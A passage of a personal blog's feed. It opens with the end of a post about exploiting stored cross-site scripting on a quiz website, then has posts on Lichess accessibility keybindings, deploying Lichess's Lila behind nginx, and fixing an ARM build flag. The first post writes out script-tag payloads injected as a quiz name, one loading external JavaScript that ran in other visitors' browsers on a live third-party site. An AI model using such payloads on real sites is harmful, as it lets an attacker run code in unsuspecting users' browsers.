The server <em>could</em> check to see if the input is too long and reject it if it is.
|
|
|
The Quiz My Friends server has <em>no such checks in place</em>.
|
|
|
Therefore, I can send an almost arbitrary load to them.
|
|
|
Being able to send something potentially very large (more than a few megabytes) is a vulnerability of its own.
|
|
|
Imagine being able to send entire executable programs as your “name” in one of these quizzes?</p>
|
|
|
|
|
|
<h2 id="javascript">Javascript</h2>
|
|
|
|
|
|
<p>So I went on my merry way thinking about ways to use malicious javascript.
|
|
|
Then, I thought that might be mean, so I decided to warn users instead.
|
|
|
I filled in the name with a script tag and a call to <code class="language-plaintext highlighter-rouge">alert()</code> to warn the user about this site.
|
|
|
I edited the max-length attribute to allow me to type a long string like this:</p>
|
|
|
|
|
|
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;script&gt;alert("Don't use this site. It is not secure!");&lt;/script&gt;
|
|
|
</code></pre></div></div>
|
|
|
|
|
|
<p>Sure enough, I got a text from my friend saying: “Tait! I know this is you, why would you do that!”
|
|
|
A bit salty, but who wouldn’t be.</p>
|
|
|
|
|
|
<h2 id="cross-site-scripting-xss">Cross-Site Scripting (XSS)</h2>
|
|
|
|
|
|
<p>As my final act, I decided to use a cross-site script that I could edit and have it load with new changes at any time.</p>
|
|
|
|
|
|
<p>I set this as my name:</p>
|
|
|
|
|
|
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;script src="https://tait.tech/assets/js/hacked.js"&gt;&lt;/script&gt;
|
|
|
</code></pre></div></div>
|
|
|
|
|
|
<p>This script pops up a warning, telling the user that the site is insecure and it is now redirecting to an article about the attack.
|
|
|
This script redirects to an <a href="https://tait.tech/2020/04/25/xss/">older post I made</a> about how XSS works.</p>
|
|
|
|
|
|
<h2 id="conclusion">Conclusion</h2>
|
|
|
|
|
|
<p>Watch out for sketchy websites that may be vulnerable to malicious or insecure sites which are ripe for abuse.
|
|
|
Always check that you are using an encrypted connection, HTTPS.
|
|
|
And if you see any messages warning you that a site is not secure and redirecting you to some random site…
|
|
|
Take their info with a grain of salt.</p>
|
|
|
|
|
|
<p>Happy Hacking, literally :)</p></content><author><name></name></author><summary type="html">Note: I have alerted the administrators of this site multiple times about this vulnerability. One email was sent many years ago, which is more than enough time for responsible disclosure.</summary></entry><entry><title type="html">Lichess Accessibility</title><link href="/2021/01/31/lichess/" rel="alternate" type="text/html" title="Lichess Accessibility" /><published>2021-01-31T00:00:00-07:00</published><updated>2021-01-31T00:00:00-07:00</updated><id>/2021/01/31/lichess</id><content type="html" xml:base="/2021/01/31/lichess/"><p>I wanted to play chess with somebody who used a screen reader, without requiring a screen reader myself;
|
|
|
some sites, like QuintenC’s Playroom have a rather poor visual interface for anyone who would like the play the game visually.
|
|
|
<a href="https://lichess.org">Lichess</a> is an free and open-source website for chess players;
|
|
|
it bridges this gap by having two “modes” on the site:
|
|
|
standard mode and accessibility mode.</p>
|
|
|
|
|
|
<h2 id="accessibility-mode">Accessibility Mode</h2>
|
|
|
|
|
|
<p>Accessibility mode is far from perfect on lichess.org.
|
|
|
That said, the idea to separate the sites into different modes was a good call.
|
|
|
It stops the inevitable “this would work well for screen readers but cause visual issues” shenanigans,
|
|
|
or, vice-verse “this looks great but it might be weird with a screen reader”.
|
|
|
This way all the things which affect the visual interface are in one place,
|
|
|
and all things which affect the non-visual user interface (NVUI) are written in another.</p>
|
|
|
|
|
|
<p>In my quest to play chess with visual and non-visual players with both having optimal experiences, I tried Lichess with my friend from <a href="https://melly.tech/">melly.tech</a>.
|
|
|
She pointed out that the method to interface with the board previously was rather poor.
|
|
|
This is because it required an “enter” at the end of each command and the commands tended to read out a row or column of a chessboard not just an individual square.</p>
|
|
|
|
|
|
<p>For example, to list all pieces (or lack thereof) on the e file, I would type the command:</p>
|
|
|
|
|
|
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>s e
|
|
|
</code></pre></div></div>
|
|
|
|
|
|
<p>Although this seems good in theory, and it’s great when you need an entire file, there was no way to get only one square.
|
|
|
In addition, imagine typing to navigate around the board:</p>
|
|
|
|
|
|
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>s e1
|
|
|
s f1
|
|
|
s e2
|
|
|
</code></pre></div></div>
|
|
|
|
|
|
<p>For the inexperienced player, it seems to be more convenient to bind some keys and have the user bounce to various buttons, which they can push to say “I want to move this piece”.
|
|
|
This is what I was told anyway.
|
|
|
So I want to work making a system so you could use the following basic keys:</p>
|
|
|
|
|
|
<ul>
|
|
|
<li>left/right/up/down arrow: move on the board.</li>
|
|
|
<li>k/q/r/b/n/p: move to next piece represented by its character in chess notation.</li>
|
|
|
<li>shift + k/q/r/b/n/p: move back to the last piece represented by its character in chess notation.</li>
|
|
|
<li>click/enter/space: select piece to move.</li>
|
|
|
<li>click/enter/space again: move piece here.</li>
|
|
|
<li>m: show where I can move with this piece.</li>
|
|
|
<li>shift+m: show where I can capture with this piece.</li>
|
|
|
<li>1-8: move to rank 1-8; stay on same file.</li>
|
|
|
<li>shift + 1-8: move to file a-h; stay on same rank.</li>
|
|
|
</ul>
|
|
|
|
|
|
<p>This gives a pretty solid basis for playing the game.
|
|
|
One caveat is after you have moved a pawn all the way to the farthest rank, only the destination tile will accept your promotion choice.
|
|
|
Therefore, all the other keys still work on other square, but if you are on the destination square of a promotion q/r/b/n will promote your piece, not jump you to the next/previous one.</p>
|
|
|
|
|
|
<p>This pull request was merged earlier this month:</p>
|
|
|
|
|
|
<h2 id="more-to-come">More To Come</h2>
|
|
|
|
|
|
<p>Next thing I want to do is implement the analysis board.
|
|
|
Right now it is not accessible whatsoever.</p>
|
|
|
|
|
|
<h2 id="help-me">Help Me</h2>
|
|
|
|
|
|
<p>If you are a screen reader user or know about accessibility and want to help make Lichess an awesome chess site for sighted and unsighted players alike,
|
|
|
then send me an email at <a href="mailto:tait@tait.tech">tait@tait.tech</a> and I’ll BCC you once I start testing the analysis board.</p>
|
|
|
|
|
|
<p>Happy hacking, y’all!</p></content><author><name></name></author><summary type="html">I wanted to play chess with somebody who used a screen reader, without requiring a screen reader myself; some sites, like QuintenC’s Playroom have a rather poor visual interface for anyone who would like the play the game visually. Lichess is an free and open-source website for chess players; it bridges this gap by having two “modes” on the site: standard mode and accessibility mode.</summary></entry><entry><title type="html">How to Deploy Lichess’s Lila With Nginx</title><link href="/2020/12/20/deploy-lichess/" rel="alternate" type="text/html" title="How to Deploy Lichess’s Lila With Nginx" /><published>2020-12-20T00:00:00-07:00</published><updated>2020-12-20T00:00:00-07:00</updated><id>/2020/12/20/deploy-lichess</id><content type="html" xml:base="/2020/12/20/deploy-lichess/"><p>I was getting ready to have a public test of some changes I made to <a href="https://lichess.org">lichess.org</a>’s <a href="https://lichess.org/source">open source chess platform</a>.
|
|
|
In preperation, I got my Let’s Encrypt certificates and nginx configurations setup…
|
|
|
and it wouldn’t work.
|
|
|
Here are some tips for myself and future Lichess developers.</p>
|
|
|
|
|
|
<h2 id="reasoning">Reasoning</h2>
|
|
|
|
|
|
<p>My pull request involves accessibility.
|
|
|
It will extend Lichess’s NVUI (Non-Visual User Interface) to be more accessible to beginner level chess players.
|
|
|
At the time of writing this, Lichess’s NVUI only supports searching pieces by type, rank and file.
|
|
|
It does not support any kind of interactive board.</p>
|
|
|
|
|
|
<p>I wanted to play chess with a friend of mine who uses a screen reader.
|
|
|
Even though Lichess does indeed have a separate rendering of the page for visually impaired users,
|
|
|
I have heard from a few people that it is not the best.</p>
|
|
|
|
|
|
<p>I don’t use a screen reader myself, so I thought having a public latest changes deployed server would work better for testing.
|
|
|
It would certainly work better than getting some of my less computer literate friends to connect to me via VSCode/VPN and view my local repository.</p>
|
|
|
|
|
|
<p>So here is how to deploy it:</p>
|
|
|
|
|
|
<h2 id="setup-a-development-environment">Setup a development environment</h2>
|
|
|
|
|
|
<p>This is described <a href="https://github.com/ornicar/lila/wiki/Lichess-Development-Onboarding">in Lichess’s documentation itself</a>.
|
|
|
I will not elaborate further as it is not necessary.</p>
|
|
|
|
|
|
<h2 id="setup-nginx">Setup nginx</h2>
|
|
|
|
|
|
<p>This is the part that stumps most people.
|
|
|
Getting a local development server usually works alright, but once you want to reverse proxy it for security and professionalism purposes, it get more interesting.</p>
|
|
|
|
|
|
<p>Here is the relevant portion of my nginx configuration for lila:</p>
|
|
|
|
|
|
<pre class="file">
|
|
|
server_name chess.tait.tech;
|
|
|
|
|
|
location / {
|
|
|
proxy_pass http://127.0.0.1:9663;
|
|
|
proxy_set_header Host $host;
|
|
|
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
|
|
|
proxy_set_header X-NginX-Proxy true;
|
|
|
proxy_set_header X-Real-IP $remote_addr;
|
|
|
}
|
|
|
</pre>
|
|
|
|
|
|
<p>This is the config for the lila-ws websocket subdomain:</p>
|
|
|
|
|
|
<pre class="file">
|
|
|
server_name ws.chess.tait.tech;
|
|
|
|
|
|
location / {
|
|
|
proxy_pass http://127.0.0.1:9664;
|
|
|
proxy_http_version 1.1;
|
|
|
proxy_set_header Upgrade $http_upgrade;
|
|
|
proxy_set_header Connection "upgrade";
|
|
|
}
|
|
|
</pre>
|
|
|
|
|
|
<p>You will need to deploy these on two virtual hosts.</p>
|
|
|
|
|
|
<h2 id="lila">Lila</h2>
|
|
|
|
|
|
<p><a href="https://github.com/ornicar/lila/">Lila</a> is the name for the main chess server, we need to change a few settings. Here is my git diff for the <code class="language-plaintext highlighter-rouge">conf/base.conf</code> file:</p>
|
|
|
|
|
|
<pre class="file">
|
|
|
- domain = "localhost:9663"
|
|
|
- socket.domains = [ "localhost:9664" ]
|
|
|
+ domain = "chess.tait.tech"
|
|
|
+ socket.domains = [ "ws.chess.tait.tech" ]
|
|
|
asset.domain = ${net.domain}
|
|
|
- asset.base_url = "http://"${net.asset.domain}
|
|
|
+ asset.base_url = "https://"${net.asset.domain}
|
|
|
asset.minified = false
|
|
|
- base_url = "http://"${net.domain}
|
|
|
+ base_url = "https://"${net.domain}
|
|
|
</pre>
|
|
|
|
|
|
<h3 id="lila-ws">Lila-ws</h3>
|
|
|
|
|
|
<p><a href="https://github.com/ornicar/lila-ws/">Lila-ws</a> is the websocket component of Lila.</p>
|
|
|
|
|
|
<p>The most common complaint amongst aspiring Lichess developers is websockets not working.
|
|
|
They constantly get these ‘101’ responses from the websocket,
|
|
|
and it also seems that the websocket returns instead of staying in the ‘pending’ state as it should be.</p>
|
|
|
|
|
|
<p>Here is how to fix that (in diff format):</p>
|
|
|
|
|
|
<pre class="file">
|
|
|
-csrf.origin = "http://127.0.0.1:9000"
|
|
|
+csrf.origin = "https://chess.tait.tech"
|
|
|
</pre>
|
|
|
|
|
|
<p>You need to tell lila-ws where the websocket requests will be coming from. This is how to do that.</p>
|
|
|
|
|
|
<h2 id="conclusion">Conclusion</h2>
|
|
|
|
|
|
<p>This is not a long article, but just some notes for future me and Lila developers.</p></content><author><name></name></author><summary type="html">I was getting ready to have a public test of some changes I made to lichess.org’s open source chess platform. In preperation, I got my Let’s Encrypt certificates and nginx configurations setup… and it wouldn’t work. Here are some tips for myself and future Lichess developers.</summary></entry><entry><title type="html">Getting Pacaur Working on a Raspberry Pi 4 with Manjaro ARM or Arch Linux</title><link href="/2020/12/01/pacaur-rpi/" rel="alternate" type="text/html" title="Getting Pacaur Working on a Raspberry Pi 4 with Manjaro ARM or Arch Linux" /><published>2020-12-01T00:00:00-07:00</published><updated>2020-12-01T00:00:00-07:00</updated><id>/2020/12/01/pacaur-rpi</id><content type="html" xml:base="/2020/12/01/pacaur-rpi/"><p>I recently installed Manjaro ARM (based on Arch Linux ARM) on a Raspberry Pi 4.
|
|
|
I used some standard commands to start to add the <code class="language-plaintext highlighter-rouge">pacaur</code> package so I can easily retrieve <a href="https://wiki.archlinux.org/index.php/Arch_User_Repository">AUR packages</a> without needing to do it manually.
|
|
|
Unfortunately, there is a small problem with compiling this on ARM.</p>
|
|
|
|
|
|
<h2 id="always_inline">always_inline</h2>
|
|
|
|
|
|
<p>To setup the install for <code class="language-plaintext highlighter-rouge">pacaur</code>, I first needed to download <a href="https://aur.archlinux.org/packages/auracle-git">auracle-git</a> AUR package manually.
|
|
|
I ran into an error when compiling this package.</p>
|
|
|
|
|
|
<p>But first, my setup:</p>
|
|
|
<pre class="terminal">
|
|
|
$ git clone https://aur.archlinux.org/auracle-git
|
|
|
$ cd auracle-git
|
|
|
$ makepkg -sri
|
|
|
</pre>
|
|
|
|
|
|
<p>Around half way through compiling this project, I got this cryptic message telling me there was a “target specific option mismatch”…Whatever that means.
|
|
|
The full error is below, hopefully that helps my chances on the search engines.</p>
|
|
|
|
|
|
<pre class="terminal">
|
|
|
In file included from ../subprojects/abseil-cpp-20200225.2/absl/random/internal/randen_hwaes.cc:225:
|
|
|
/usr/lib/gcc/aarch64-unknown-linux-gnu/9.3.0/include/arm_neon.h: In function 'Vector128 {anonymous}::AesRound(const Vector128&amp;, const Vector128&amp;)':
|
|
|
/usr/lib/gcc/aarch64-unknown-linux-gnu/9.3.0/include/arm_neon.h:12452:1: error: inlining failed in call to always_inline 'uint8x16_t vaesmcq_u8(uint8x16_t)': target specific option mismatch
|
|
|
12452 | vaesmcq_u8 (uint8x16_t data)
|
|
|
</pre>
|
|
|
|
|
|
<p>Luckily, there is a very easy fix for this.
|
|
|
The user redfish <a href="https://aur.archlinux.org/packages/auracle-git#comment-762117">helpfully pointed out</a>
|
|
|
on the <code class="language-plaintext highlighter-rouge">auracle-git</code> package page that you need to add a special make option to your <code class="language-plaintext highlighter-rouge">/etc/make.conf</code> file to make this work.</p>
|
|
|
|
|
|
<p>His solution, as commented is like so:</p>
|
|
|
|
|
|
<blockquote>
|
|
|
<p>If you get this error when building for ARM aarch64:</p>
|
|
|
|
|
|
<p>(insert error message from before)</p>
|
|
|
|
|
|
<p>Then check that in /etc/makepkg.conf CFLAGS and CXXFLAGS have the +crypto suffix in -march flag, like -march=armv8-a+crypto (the base identifier may very depending on your hardware)</p>
|
|
|
</blockquote>
|
|
|
|
|
|
<p>Basically, there is a file on Linux: <code class="language-plaintext highlighter-rouge">/etc/makepkg.conf</code> which tells your computer how to compile <em>all</em> programs on the system.
|
|
|
By default the Manjaro ARM (RPi4) edition has the following relevant lines in <code class="language-plaintext highlighter-rouge">makepkg.conf</code>.</p>
|
|
|
|
|
|
<pre class="file">
|
|
|
CFLAGS="-march=armv8-a -O2 -pipe -fstack-protector-strong -fno-plt"
|
|
|
CXXFLAGS="-march=armv8-a -O2 -pipe -fstack-protector-strong -fno-plt"
|
|
|
</pre>
|
|
|
|
|
|
<p>What Mr. redfish is telling us is that we must add ‘+crypto’ to the end of the -march compiler flag so that our compiler will know how to inline that pesky vaesmcq_u8 function.</p>
|
|
|
|
|
|
<p>So in the end, your <code class="language-plaintext highlighter-rouge">makepkg.conf</code>’s relevant lines will look like so:</p>
|
|
|
<pre class="file">
|
|
|
CFLAGS="-march=armv8-a+crypto -O2 -pipe -fstack-protector-strong -fno-plt"
|
|
|
CXXFLAGS="-march=armv8-a+crypto -O2 -pipe -fstack-protector-strong -fno-plt"
|
|
|
</pre>
|
|
|
|
|
|
<h2 id="why">Why?</h2>
|
|
|
|
|
|
<p>Redfish continues:</p>
|
|
|
|
|
|
<blockquote>
|
|
|
<p>Build of abseil-cpp package works because it uses CMake which adds the correct -march flag regardless of makepkg.conf, whereas when abseil-cpp is build as a subproject within this package, it uses meson, which does not add the flag and thus fails with the above error.</p>
|
|
|
</blockquote>
|
|
|
|
|
|
<p>In other words, one of the dependencies pulled in with auracle is not compiling without this special compiler flag enabled.</p>
|
|
|
|
|
|
<h2 id="conclusion">Conclusion</h2>
|
|
|
|
|
|
<p>Thanks to redfish for posting this solution to the forums!
|
|
|
Would’ve been quite the rabbit hole for me to figure out how to do that.
|
|
|
In fact, it is very likely I would have never figured that one out.</p>
|
|
|
|
|
|
<p>After this issue is resolved, the installation of <code class="language-plaintext highlighter-rouge">pacaur</code> goes as expected. Nice and easy!
|
|
|
Pacuar will compile on any architecture so it’s smooth sailing from here.</p>
|
|
|
|
|
|
<p>Happy hacking!</p></content><author><name></name></author><summary type="html">I recently installed Manjaro ARM (based on Arch Linux ARM) on a Raspberry Pi 4. I used some standard commands to start to add the pacaur package so I can easily retrieve AUR packages without needing to do it manually. Unfortunately, there is a small problem with compiling this on ARM.</summary></entry></feed> |
